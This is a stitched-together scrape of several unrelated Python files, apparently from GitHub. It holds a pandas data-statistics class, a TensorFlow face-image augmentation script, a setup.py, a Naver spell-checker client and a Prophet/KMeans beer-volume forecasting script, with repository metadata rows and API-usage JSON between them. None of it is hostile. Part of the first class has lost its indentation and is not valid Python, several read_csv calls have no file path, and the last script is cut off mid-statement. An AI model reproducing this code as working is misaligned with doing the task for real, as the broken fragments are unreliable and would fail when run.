        """True once set_class() has stored a label vector."""
        return self.classes is not None

    def get_classes(self):
        """Return the stored label vector (None when unset)."""
        return self.classes
# Encode categorical data into integer ids
def encode_categorical(self):
le = prep.LabelEncoder()
for x in self.df.columns:
if self.df[x].dtypes == 'object':
self.df[x] = le.fit_transform(self.df[x])
# Set a column to categorical data
def set_categorical(self, column):
self.df[column] = self.df[column].astype(str)
########### Magical Methods #################################
    def __len__(self):
        # Number of rows in the stored frame.
        return len(self.df)

    def __str__(self):
        return str(self.df)

    def __getitem__(self, index):
        # Column access delegates to the underlying DataFrame.
        return self.df[index]

    def __iter__(self):
        # NOTE(review): _index is not reset here, so a second iteration
        # resumes where the previous one stopped — confirm intended.
        return self

    def __next__(self):
        # Yield rows by position until the index runs out.
        try:
            result = self.df.loc[self.df.index[self._index]]
        except IndexError:
            raise StopIteration
        self._index += 1
        return result
############ Data Transformation Methods ####################
    def get_stats(self, output_format='df'):
        """Per-column descriptive statistics.

        output_format: 'df' (DataFrame), 'html', or anything else for a
        plain-text rendering.
        """
        le = prep.LabelEncoder()
        stats = {}
        for i, a in enumerate(self.df.columns):
            stats[a] = {}
            ## Type
            stats[a]['type'] = self.df.dtypes[i]
            ## Counting
            stats[a]['count'] = self.df[a].count()
            ## Non-unique values
            stats[a]['nunique'] = self.df[a].nunique()
            ## Mode
            # Mode is only reported when it is unique; ties give None.
            mode = self.df[a].mode()
            if len(mode) == 1:
                stats[a]['mode'] = mode[0]
            else:
                stats[a]['mode'] = None
            if pd.api.types.is_numeric_dtype(self.df[a]):
                ## Entropy
                # Entropy of the 10-bin histogram of the column.
                hist = np.histogram(self.df[a])[0]
                p = hist / np.sum(hist)
                stats[a]['entropy'] = sts.entropy(p)
                ## Variance
                stats[a]['variance'] = self.df[a].var()
                ## Average
                stats[a]['average'] = self.df[a].mean()
                ## Dispersion
                # NOTE(review): a zero (or NaN-free falsy) mean yields a
                # dispersion of 0.0 rather than inf — confirm intended.
                if stats[a]['average']:
                    stats[a]['dispersion'] = stats[a]['variance'] / stats[a]['average']
                else:
                    stats[a]['dispersion'] = 0.0
                ## Standard deviation
                stats[a]['std_dev'] = self.df[a].std()
                ## Minimum and maximum
                stats[a]['min'] = self.df[a].min()
                stats[a]['max'] = self.df[a].max()
                ## Median
                stats[a]['median'] = self.df[a].median()
                ## Skewness and Kurtosis
                stats[a]['skewness'] = self.df[a].skew()
                stats[a]['kurtosis'] = self.df[a].kurt()
                ## Quantiles
                qts = self.df[a].quantile([0.25, 0.5, 0.75])
                stats[a]['quantile1'] = qts[0.25]
                stats[a]['quantile2'] = qts[0.5]
                stats[a]['quantile3'] = qts[0.75]
            else:
                # Non-numeric: label-encode to compute an entropy; all
                # other numeric statistics are set to None.
                tmp = le.fit_transform(self.df[a])
                hist = np.histogram(tmp)[0]
                p = hist / np.sum(hist)
                stats[a]['entropy'] = sts.entropy(p)
                stats[a]['variance'] = None
                stats[a]['average'] = None
                stats[a]['dispersion'] = None
                stats[a]['std_dev'] = None
                stats[a]['min'] = None
                stats[a]['max'] = None
                stats[a]['median'] = None
                stats[a]['skewness'] = None
                stats[a]['kurtosis'] = None
                stats[a]['quantile1'] = None
                stats[a]['quantile2'] = None
                stats[a]['quantile3'] = None
        stats_df = pd.DataFrame.from_dict(stats, orient=self.orient)
        if output_format == 'df':
            return stats_df
        elif output_format == 'html':
            return '<h2 style="text-align:center">Stored Data Description</h2>' + stats_df.to_html()
        else:
            return 'Stored Data Description\n' + str(stats_df)
def normalize(self):
if not self.normalized:
numeric_data = self.get_numeric_data()
maxima = numeric_data.max()
minima = numeric_data.min()
data_range = maxima - minima
data_range[data_range == 0] = 1.0
numeric_data = (numeric_data - minima) / data_range
self.df[numeric_data.columns] = numeric_data
self.minima = minima
self.maxima = maxima
self.normalized = True
def denormalize(self):
if self.normalized:
if (self.minima is not None) and (self.maxima is not None):
numeric_data = self.get_numeric_data()
numeric_data = numeric_data * (self.maxima - self.minima) + self.minima
self.df[numeric_data.columns] = numeric_data
self.normalized = False
    def split_outliers(self, limQ1=25, limQ3=75, c=1.5):
        """Split IQR outlier rows out of the stored frame.

        Rows with any value below q1 - c*iqr go to self.outliers_inf,
        rows with any value above q3 + c*iqr go to self.outliers_sup;
        both groups are dropped from self.df.
        """
        numeric_data = self.get_numeric_data()
        q1 = np.percentile(numeric_data, limQ1, axis=0)
        q3 = np.percentile(numeric_data, limQ3, axis=0)
        iqr = sts.iqr(numeric_data, axis=0)
        keep = []
        sup = []
        inf = []
        for i in range(len(numeric_data)):
            d = numeric_data.loc[numeric_data.index[i]]
            # A row is an inferior outlier if ANY column is below range;
            # inferior takes precedence over superior.
            test_inf = d < q1 - c * iqr
            if test_inf.any():
                inf.append(i)
            else:
                test_sup = d > q3 + c * iqr
                if test_sup.any():
                    sup.append(i)
                else:
                    keep.append(i)
        drop = False
        if len(inf):
            self.outliers_inf = self.df.loc[self.df.index[inf]]
            drop = True
        if len(sup):
            self.outliers_sup = self.df.loc[self.df.index[sup]]
            drop = True
        if drop:
            # NOTE(review): drop() receives positional indices as labels;
            # this is only correct when the index is the default
            # RangeIndex — confirm, or use self.df.index[inf + sup].
            self.df.drop(inf + sup, inplace=True)
def get_numeric_data(self):
return self.df._get_numeric_data()
| mhfribeiro/safra-meta | modules/preprocess/dmt.py | dmt.py | py | 10,322 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "pandas.read_json",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "pickle.load",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame.from_di... |
41329717796 |
import tensorflow as tf
import numpy as np
import cv2
import os
def save_image(path, image):
    """Encode *image* according to the path's extension and write it to disk.

    np/tofile is used (instead of cv2.imwrite) so non-ASCII paths work.
    """
    ext = os.path.splitext(path)[1]
    ok, encoded = cv2.imencode(ext, image)
    if ok:
        with open(path, "wb") as fh:
            encoded.tofile(fh)
# Ask which subject's face folder to augment.
target = input("대상을 입력하세요 : ")

# Folder holding the subject's face crops.
image_path = "./image/" + target + "_face"

# Walk every image in the folder and write augmented variants next to it.
for i, img in enumerate(os.listdir(image_path)):
    # Read via np.fromfile + imdecode so non-ASCII paths work.
    image = cv2.imdecode(np.fromfile(os.path.join(image_path, img), dtype=np.uint8), cv2.IMREAD_COLOR)
    # NOTE(review): despite the name, this converts BGR->RGB, not to gray.
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)

    # Horizontal flip variant.
    flipped = tf.image.flip_left_right(gray)
    path = "./image/" + target + "_face/flipped" + img
    save_image(path, np.array(flipped))

    # Grayscale variant.
    grayscaled = tf.image.rgb_to_grayscale(gray)
    path = "./image/" + target + "_face/grayscaled" + img
    # Bug fix: the original saved `flipped` here, so the grayscale
    # variant was never actually written.
    save_image(path, np.array(grayscaled))

    # Saturation sweep (factors 1..5).
    for sf in range(1, 6):
        saturated = tf.image.adjust_saturation(gray, sf)
        path = "./image/" + target + "_face/saturated" + str(sf) + img
        save_image(path, np.array(saturated))

    # Brightness sweep (deltas 0.1..0.5).
    for delta in range(1, 6):
        bright = tf.image.adjust_brightness(gray, delta * 0.1)
        path = "./image/" + target + "_face/bright" + str(delta) + img
        save_image(path, np.array(bright))

    print(i)
| moonsung1234/SimilarityComparisonProject | increase.py | increase.py | py | 1,532 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.splitext",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "cv2.imencode",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number... |
75187049704 | import os
from setuptools import setup
def read(fname):
    """Return the text of *fname*, resolved relative to this file's directory.

    Fix: the original leaked the file handle (open() with no close) and
    relied on the platform default encoding; a context manager and an
    explicit UTF-8 encoding make it deterministic.
    """
    path = os.path.join(os.path.dirname(__file__), fname)
    with open(path, encoding="utf-8") as fh:
        return fh.read()
# Parse requirements.txt into a clean list of pip requirement strings,
# skipping blanks, comment lines and VCS (git+) entries.
with open('requirements.txt') as fin:
    lines = fin.readlines()
    lines = [o.strip() for o in lines]
    lines = [o for o in lines if len(o) > 0]
    req = [o for o in lines if not o.startswith('#') and not o.startswith('git+')]
setup(
    name="resvit",
    version="0.1",
    author="Nghia Huynh",
    author_email="huynhnguyenhieunghia1999@gmail.com",
    description=("An package of Image Pretraining using U-Net architecture"),
    packages=['resvit'],
    long_description=read('README.md'),
    # Fix: `req` is parsed from requirements.txt above but was never
    # wired into the distribution metadata.
    install_requires=req,
)
{
"api_name": "os.path.join",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "setuptools.setup",
"line_n... |
41924245365 | from .sentence_cutting import cutting_500_under
import requests, json
def cleaned_result(final_result):
    """Convert the checker's class-based span markup into inline-styled spans.

    Splits *final_result* on '<br>', rewrites the spell-checker's CSS-class
    span openers into inline color styles, unescapes &quot;/&#39;, and wraps
    any line that ends up without a span in a plain <span>. Returns the list
    of processed lines.
    """
    # Class-span openers -> inline styles, plus the two HTML entities the
    # checker escapes. Insertion order matches the original replace chain.
    replacements = {
        "<span class='red_text'>": '<span style="color:#CC0000">',
        "<span class='green_text'>": '<span style="color:#00CC00">',
        "<span class='violet_text'>": '<span style="color:#CC00CC">',
        "<span class='blue_text'>": '<span style="color:#3B78FF">',
        "&quot;": '"',
        "&#39;": "'",
    }
    cleaned = []
    for line in final_result.split('<br>'):
        for needle, substitute in replacements.items():
            line = line.replace(needle, substitute)
        if "<span" not in line:
            line = f"<span>{line}</span>"
        cleaned.append(line)
    return cleaned
def check(text):
    """Spell-check *text* via Naver's spell-checker endpoint.

    Texts longer than 500 characters are split with cutting_500_under()
    and checked chunk by chunk; the per-chunk HTML results are re-joined
    with '<br>'. Returns the checker's HTML markup as a string.
    """
    base_url = 'https://m.search.naver.com/p/csearch/ocontent/spellchecker.nhn'
    _agent = requests.Session()
    if len(text) > 500:
        # The endpoint only accepts up to 500 characters per request.
        chunks = cutting_500_under(text)
        final_result = [_fetch_checked_html(_agent, base_url, chunk) for chunk in chunks]
        return '<br>'.join(final_result)
    else:
        return _fetch_checked_html(_agent, base_url, text)


def _fetch_checked_html(agent, base_url, sentence):
    """Send one <=500-character chunk to the checker and return its HTML result.

    Extracted to remove the request/parse logic the original duplicated in
    both branches of check().
    """
    payload = {
        '_callback': 'window.__jindo2_callback._spellingCheck_0',
        'q': sentence
    }
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
        'referer': 'https://search.naver.com/',
    }
    r = agent.get(base_url, params=payload, headers=headers)
    # The response is JSONP; slice off the fixed-length callback wrapper
    # ("window.__jindo2_callback._spellingCheck_0(" ... ");") before parsing.
    data = json.loads(r.text[42:-2])
    return data['message']['result']['html']
{
"api_name": "requests.Session",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "sentence_cutting.cutting_500_under",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "json.l... |
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 20 06:20:43 2022

@author: beauw

Beer-volume forecasting pipeline, data-loading stage: reads per-agency /
per-SKU sales history plus regional weather, demographics, events and
industry volumes, converts YearMonth columns to datetimes, and merges
everything into one "mother" modeling dataframe used by the analysis and
Prophet-modeling sections further down this script.
"""
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import itertools
from pandas import to_datetime
from prophet import Prophet
from pandas import DataFrame
from matplotlib import pyplot
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
from sklearn import preprocessing
from prophet.diagnostics import cross_validation
from prophet.diagnostics import performance_metrics
from prophet.plot import plot_cross_validation_metric
from sklearn.decomposition import PCA
# Import raw data sets. Then, combine variables into one mother dataframe.
#########################################################################
# TODO(review): every pd.read_csv() below except testing_dataframe's is
# missing its file-path argument — as written each call raises TypeError.
# The paths were presumably stripped before publishing; restore them.
# Import demographics of customers living in the region of each wholesaler.
demographics = pd.read_csv()
# Major events - such as holidays, Superbowl, big soccer games, etc.
major_events = pd.read_csv()
# Change YearMonth to Date/Time
major_events['YearMonth'] = pd.to_datetime(
    major_events['YearMonth'], format='%Y%m')
# Historical volume of each SKU
historical_volume = pd.read_csv()
# Change YearMonth to Date/Time
historical_volume['YearMonth'] = pd.to_datetime(
    historical_volume['YearMonth'], format='%Y%m')
# Overall industry soda sales
industry_soda_sales = pd.read_csv()
# Change YearMonth to Date/Time
industry_soda_sales['YearMonth'] = pd.to_datetime(
    industry_soda_sales['YearMonth'], format='%Y%m')
# Overall industry beer volume
industry_volume = pd.read_csv()
# Change Yearmonth to Date/Time
industry_volume['YearMonth'] = pd.to_datetime(
    industry_volume['YearMonth'], format='%Y%m')
# Any promotions matched up to Year Month
price_sales_promotion = pd.read_csv()
# Change YearMonth to Date/Time
price_sales_promotion['YearMonth'] = pd.to_datetime(
    price_sales_promotion['YearMonth'], format='%Y%m')
# Average temperature of YearMonth in relation to each wholesaler's region
weather = pd.read_csv()
# Change YearMonth to Date/Time
weather['YearMonth'] = pd.to_datetime(weather['YearMonth'], format='%Y%m')
# Merge all variables that depend on SKUs into one data frame - stacking
# on top of Agency, SKU, and then YearMonth
sku_dataframe = historical_volume.merge(
    price_sales_promotion, on=['Agency', 'SKU', 'YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(
    industry_soda_sales, on=['YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(
    industry_volume, on=['YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(major_events, on=['YearMonth'], how='left')
# Merge all variables that depend on Agencies (AKA distributors) by eliminating duplicates
Agency_dataframe = weather.merge(demographics, on=['Agency'], how='left')
# Let's take a look at all the Agencies
#week4_dataframe_agencies = Agency_dataframe.copy()
#week4_dataframe_agencies = week4_dataframe_agencies.groupby('Agency')
# This does not perform well in the Spyder IDE
# Merge both major dataframes (ones depending on SKUs and on Agencies) into one big dataframe
mother_dataframe = sku_dataframe.merge(
    Agency_dataframe, on=['YearMonth', 'Agency'], how='left')
# Turn the categorical SKU data into booleans columns instead. Also making
#a data frame for a PCA run.
# Keep an un-dummied copy for PCA (which label-encodes SKU itself later).
PCAmother_df = mother_dataframe.copy()
mother_dataframe = pd.get_dummies(
    mother_dataframe, columns=['SKU'], dummy_na=False)
# Check on null values in the newly formed large dataframe. Let's also check
# out the statistics.
# NOTE(review): the result of isnull().sum() is discarded — presumably this
# was inspected interactively in the IDE.
mother_dataframe.isnull().sum()
# Import the testing data now...
testing_dataframe = pd.read_csv(
    r'C:\Users\beauw\OneDrive\Desktop\Machine Learning\OSU - Data Mining Project\volume_forecast.csv')
# Visualize variables graphically that may relate with volume
# plt.scatter(mother_dataframe['Avg_Max_Temp'],mother_dataframe['Volume'])
# plt.scatter(mother_dataframe['Promotions'],mother_dataframe['Volume'])
# Let's drop the Fifa World Cup and Football Gold cup due to 0 value
# contributions.
mother_dataframe.drop(
    columns=['FIFA U-17 World Cup', 'Football Gold Cup'], inplace=True)
#Making a data frame for just SKU1 and Agency 1
agency1_SKU1_df = mother_dataframe.copy()
agency1_SKU1_df.query(
    'Agency == "Agency_01" and SKU_SKU_01 == 1', inplace=True)
agency1_SKU1_df.drop('SKU_SKU_02', axis=1, inplace=True)
agency1_SKU1_df.drop('SKU_SKU_01', axis=1, inplace=True)
#####################################################################
#####################################################################
#####################################################################
# Create a heatmap of all variables - take a close note of volume correlation
corr = mother_dataframe[mother_dataframe.columns[:21]].corr()
plt.figure(figsize=(12, 12))
sns.heatmap(corr, vmin=-1, cmap='BuPu', annot=True, fmt=".2f")
plt.show()
######################################################################
# Create a factor plot against time and volume with various variables
##THIS TAKES SERIOUS TIME AND CPU USEAGE (Thus the #s)!!
#sns.catplot(x ='YearMonth', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Price', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Promotions', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Avg_Population_2017', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Avg_Yearly_Household_Income_2017', y ='Volume', data = mother_dataframe)
# These all took a very long time to process. Saved plot pictures for later use.
######################################################################
#Find optimal number of components for ALL data using PCA. I also stacked and
#scaled the SKU data back into one column for this input.
label_encoder = preprocessing.LabelEncoder()
PCAprescaled = PCAmother_df.copy()
PCAprescaled.drop(PCAprescaled.loc[:,'Easter Day':'Music Fest'], axis=1, inplace=True)
SS = StandardScaler()
PCAprescaled['Agency'] = label_encoder.fit_transform(PCAprescaled['Agency'])
PCAprescaled['YearMonth'] = label_encoder.fit_transform(PCAprescaled['YearMonth'])
PCAprescaled['SKU'] = label_encoder.fit_transform(PCAprescaled['SKU'])
PCAscaled = SS.fit_transform(PCAprescaled)
PCAmodel = PCA(random_state=5000).fit(PCAscaled)
plt.plot(PCAmodel.explained_variance_ratio_,
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance')
plt.show()
#cumulitive run
plt.plot(np.cumsum(PCAmodel.explained_variance_ratio_),
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance Cumulative')
plt.show()
#optimal number of components for just SKU1 and Agency 1
PCAprescaled2 = agency1_SKU1_df.copy()
PCAprescaled2.drop(PCAprescaled2.iloc[:,8:17], axis=1, inplace=True)
PCAprescaled2.drop('Agency', axis=1, inplace=True)
SS = StandardScaler()
PCAprescaled2['YearMonth'] = label_encoder.fit_transform(PCAprescaled2['YearMonth'])
PCAscaled2 = SS.fit_transform(PCAprescaled2)
PCAmodel2 = PCA(random_state=5000).fit(PCAscaled2)
plt.plot(PCAmodel2.explained_variance_ratio_,
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance')
plt.show()
#cumulitive run
plt.plot(np.cumsum(PCAmodel2.explained_variance_ratio_),
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance Cumulative')
plt.show()
######################################################################
# WCSS Elbow method - then plot KMeans
# After looking at WCSS, the only viable options seem to be pricing
# And promotions.
# Pricing first. I am encoding YearMonth column to include dates as variables
mother_df_Seq = mother_dataframe.copy()
mother_df_Seq0 = mother_dataframe.copy()
label_encoder = preprocessing.LabelEncoder()
mother_df_Seq0['YearMonth'] = label_encoder.fit_transform(mother_df_Seq0['YearMonth'])
price_trans_x = mother_df_Seq0.iloc[:, [1, 2, 3]].values
Standard_Scale = StandardScaler()
Standard_Scale.fit_transform(price_trans_x[:,1:3])
wcss = []
for i in range(1, 11):
pricekmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
pricekmeans.fit(price_trans_x)
wcss.append(pricekmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit')
plt.xlabel('Price - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
# Unique labels for the cluster centroids
price_y_kmeans = KMeans(n_clusters=2, init='k-means++',
max_iter=300, n_init=10, random_state=0)
price_z_kmeans = price_y_kmeans.fit_predict(price_trans_x)
price_u_labels = np.unique(price_z_kmeans)
print(price_u_labels)
# Plot the centroids
plt.scatter(price_trans_x[price_z_kmeans == 0, 0],
price_trans_x[price_z_kmeans == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(price_trans_x[price_z_kmeans == 1, 0],
price_trans_x[price_z_kmeans == 1, 1], s=100, c='blue', label='Cluster 2')
#plt.scatter(price_trans_x[price_z_kmeans == 2, 0],
#price_trans_x[price_z_kmeans == 2, 1], s=100, c='green', label='Cluster 3')
#plt.scatter(price_trans_x[price_z_kmeans==3, 0], price_trans_x[price_z_kmeans==3, 1], s=100, c='cyan', label ='Cluster 4')
plt.scatter(price_y_kmeans.cluster_centers_[:, 0], price_y_kmeans.cluster_centers_[
:, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of Pricing')
plt.xlabel('Pricing ')
plt.ylabel('Volume')
plt.show()
# Now Promotions..
promo_trans_x = mother_df_Seq0.iloc[:, [1, 2, 5]].values
Standard_Scale.fit_transform(promo_trans_x[[1]])
Standard_Scale.fit_transform(promo_trans_x[[2]])
Standard_Scale.fit_transform(promo_trans_x[[5]])
wcss = []
for i in range(1, 11):
promokmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
promokmeans.fit(promo_trans_x)
wcss.append(promokmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit')
plt.xlabel('Promotions - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
# Unique labels for the cluster centroids
promo_y_kmeans = KMeans(n_clusters=2, init='k-means++',
max_iter=300, n_init=10, random_state=0)
promo_z_kmeans = promo_y_kmeans.fit_predict(promo_trans_x)
promo_u_labels = np.unique(promo_z_kmeans)
print(promo_u_labels)
# Plot the centroids
plt.scatter(promo_trans_x[promo_z_kmeans == 0, 0],
promo_trans_x[promo_z_kmeans == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(promo_trans_x[promo_z_kmeans == 1, 0],
promo_trans_x[promo_z_kmeans == 1, 1], s=100, c='blue', label='Cluster 2')
#plt.scatter(promo_trans_x[promo_z_kmeans == 2, 0],
#promo_trans_x[promo_z_kmeans == 2, 1], s=100, c='green', label='Cluster 3')
plt.scatter(promo_y_kmeans.cluster_centers_[:, 0], promo_y_kmeans.cluster_centers_[
:, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of Promotions')
plt.xlabel('Promotions')
plt.ylabel('Volume')
plt.show()
# Let's do Sales, Pricing, Promotions, Volume, Yearly Household Income, and
# Average Population via multi-Kmeans clustering. See if all these together
#does anything...
mother_df_Seq = mother_dataframe.copy()
mother_df_Seq.drop(
mother_df_Seq.loc[:, 'Soda_Volume':'Avg_Max_Temp'], axis=1, inplace=True)
mother_df_Seq.drop(
mother_df_Seq.loc[:, 'SKU_SKU_01':'SKU_SKU_34'], axis=1, inplace=True)
mother_df_Seq.drop('Agency', axis=1, inplace=True)
mother_df_Seq['YearMonth'] = label_encoder.fit_transform(mother_df_Seq['YearMonth'])
#mother_df_Seq.drop('YearMonth', axis=1, inplace=True)
SS = StandardScaler()
Blob_df = SS.fit_transform(mother_df_Seq.iloc[:,0:7])
blob_trans_x = Blob_df
wcss = []
for i in range(1, 11):
blobkmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
blobkmeans.fit(blob_trans_x)
wcss.append(blobkmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit - Lotta Variables')
plt.xlabel('Lotta Variables - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
cluster_results = pd.DataFrame(Blob_df, columns=['YearMonth','Volume', 'Price', 'Sales',
'Promotions', 'Avg_Population_2017',
'Avg_Yearly_Household_Income_2017'])
blob_kmeans = KMeans(n_clusters=4)
y = blob_kmeans.fit_predict(cluster_results[['YearMonth','Volume', 'Price', 'Sales',
'Promotions', 'Avg_Population_2017',
'Avg_Yearly_Household_Income_2017']])
y2 = pd.DataFrame(y, columns=[0])
cluster_results['Cluster_Results'] = y2
plt.scatter(blob_trans_x[y == 0, 0],
blob_trans_x[y == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(blob_trans_x[y == 1, 0],
blob_trans_x[y == 1, 1], s=100, c='blue', label='Cluster 2')
plt.scatter(blob_trans_x[y == 2, 0],
blob_trans_x[y == 2, 1], s=100, c='green', label='Cluster 3')
plt.scatter(blob_trans_x[y == 3, 0],
blob_trans_x[y == 3, 1], s=100, c='orange', label='Cluster 4')
plt.scatter(blob_kmeans.cluster_centers_[:, 0], blob_kmeans.cluster_centers_[
:, 1], s=100, c='yellow', label='Centroids')
plt.title('Clusters of a Bunch of Variables')
plt.xlabel('Variables')
plt.ylabel('Y')
plt.show()
# KMeans now completed for Promotions and Pricing.
######################################################################
######################################################################
######################################################################
######################################################################
######################################################################
######################################################################
# Creating 3 separate Prophet algorithms, which will make a new dataframe
# with industry volume, soda volume, and avg temperature.
### in order to prepare Prophet for making a prediction of SKU 1 and Agency 1
prophet_feed_df = mother_dataframe.copy()
prophet_feed_soda = prophet_feed_df[['YearMonth', 'Soda_Volume']]
prophet_feed_industry = prophet_feed_df[['YearMonth', 'Industry_Volume']]
# For the weather forecast, we will need to train algorithms on all of
# agency 1's data only (regardless of SKU. Filtering out the rest of the agencies...
prophet_feed_weather = prophet_feed_df[['YearMonth', 'Avg_Max_Temp', 'Agency']]
prophet_feed_weather.query('Agency == "Agency_01"', inplace=True)
prophet_feed_weather.drop('Agency', axis=1, inplace=True)
# Assign Prophet friendly names to variables in both data sets.
# Change time to date-time format.
prophet_feed_soda.columns = ['ds', 'y']
prophet_feed_soda['ds'] = to_datetime(prophet_feed_soda['ds'])
prophet_feed_industry.columns = ['ds', 'y']
prophet_feed_industry['ds'] = to_datetime(prophet_feed_industry['ds'])
prophet_feed_weather.columns = ['ds', 'y']
prophet_feed_weather['ds'] = to_datetime(prophet_feed_weather['ds'])
# Label the Meta Prophet algorithm for each variable
industry_prophet = Prophet()
industry_prophet.fit(prophet_feed_industry)
soda_prophet = Prophet()
soda_prophet.fit(prophet_feed_soda)
weather_prophet = Prophet()
weather_prophet.fit(prophet_feed_weather)
# Combine all futures data and evaluate the three Prophets' predictions.
#### Build a Future forecast dataframe for the soda prophet predict.
sodafuture = list()
for s in range(1, 13):
sodadate = '2018-%02d' % s
sodafuture.append([sodadate])
sodafuture = DataFrame(sodafuture)
sodafuture.columns = ['ds']
sodafuture['ds'] = to_datetime(sodafuture['ds'])
#Build Soda Meta Prophet model
### Insert top rated parameters for Soda model
soda_param_grid = {
'changepoint_prior_scale': [0.0001],#This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.001],#This is the lowest value in MAPE reduction
}
soda_all_params = [dict(zip(soda_param_grid.keys(),
sod)) for sod in itertools.product(*soda_param_grid.values())]
for sparams in soda_all_params:
soda_prophet = Prophet(**sparams).fit(prophet_feed_soda)
# Make Soda prediction dataframe.
sodaforecast = soda_prophet.predict(sodafuture)
# Plot the overall beer industry prediction from Soda Prophet
soda_prophet.plot(sodaforecast)
pyplot.show()
# Evaluate performance of the Soda Prophet
soda_crossval = cross_validation(soda_prophet, initial='1095 days', period='31 days', horizon = '365 days')
soda_prophet_performance = performance_metrics(soda_crossval)
soda_fig_performance = plot_cross_validation_metric(soda_crossval, metric='mape')
#### Build a Future forecast dataframe for the industry prophet predict.
industryfuture = list()
for b in range(1, 13):
industrydate = '2018-%02d' % b
industryfuture.append([industrydate])
industryfuture = DataFrame(industryfuture)
industryfuture.columns = ['ds']
industryfuture['ds'] = to_datetime(industryfuture['ds'])
#Build Industry Meta Prophet model
### Insert top rated parameters for Industry model
industry_param_grid = {
'changepoint_prior_scale': [0.0001], #This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.001], #This is the lowest value in MAPE reduction
}
industry_all_params = [dict(zip(industry_param_grid.keys(),
ind)) for ind in itertools.product(*industry_param_grid.values())]
for iparams in industry_all_params:
industry_prophet = Prophet(**iparams).fit(prophet_feed_industry)
# Make industry prediction dataframe.
industryforecast = industry_prophet.predict(industryfuture)
# Plot the overall beer industry prediction from iIndustry Prophet
industry_prophet.plot(industryforecast)
pyplot.show()
# Evaluate performance of the industry Prophet
industry_crossval = cross_validation(industry_prophet, initial='1095 days', period='31 days', horizon = '365 days')
industry_prophet_performance = performance_metrics(industry_crossval)
industry_fig_performance = plot_cross_validation_metric(industry_crossval, metric='mape')
# Build a Future forecast dataframe for the weather prophet predict.
weatherfuture = list()
for c in range(1, 13):
weatherdate = '2018-%02d' % c
weatherfuture.append([weatherdate])
weatherfuture = DataFrame(weatherfuture)
weatherfuture.columns = ['ds']
weatherfuture['ds'] = to_datetime(weatherfuture['ds'])
#Build weather Meta Prophet model
### Insert top rated parameters for weather model
weather_param_grid = {
'changepoint_prior_scale': [0.01],#This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.01],#This is the lowest value in MAPE reduction
'holidays_prior_scale': [0.0001],
}
weather_all_params = [dict(zip(weather_param_grid.keys(),
wet)) for wet in itertools.product(*weather_param_grid.values())]
for wparams in weather_all_params:
weather_prophet = Prophet(**wparams).fit(prophet_feed_weather)
# Make weather prediction dataframe.
weatherforecast = weather_prophet.predict(weatherfuture)
# Plot the overall beer weather prediction from weather Prophet
weather_prophet.plot(weatherforecast)
pyplot.show()
#Crossval weather Prophet
weatherforecast = weather_prophet.predict(weatherfuture)
weather_crossval = cross_validation(weather_prophet,initial='1095 days', period='31 days', horizon = '365 days')
weather_prophet_performance = performance_metrics(weather_crossval)
weather_fig_performance = plot_cross_validation_metric(weather_crossval, metric='mape')
#########################################################################
# Start merging all predictions onto one data frame,
#and change names of columns for final volume predict.
Futures_df = weatherforecast[['ds', 'yhat']]
Futures_df = Futures_df.rename(columns={'yhat': 'Avg_Max_Temp'})
Futures_df.insert(2, 'yhat', industryforecast['yhat'])
Futures_df = Futures_df.rename(columns={'yhat': 'Industry_Volume'})
Futures_df.insert(3, 'yhat', sodaforecast['yhat'])
Futures_df = Futures_df.rename(columns={'yhat': 'Soda_Volume'})
Futures_df = Futures_df.rename(columns={'YearMonth': 'ds'})
##########################################################################
##Here is the most important part of the whole coding: the last prophet
#That will predict volume based on other prophet algorithm results.
a1s1_prophet_feed = agency1_SKU1_df[['YearMonth','Volume','Avg_Max_Temp',
'Industry_Volume',
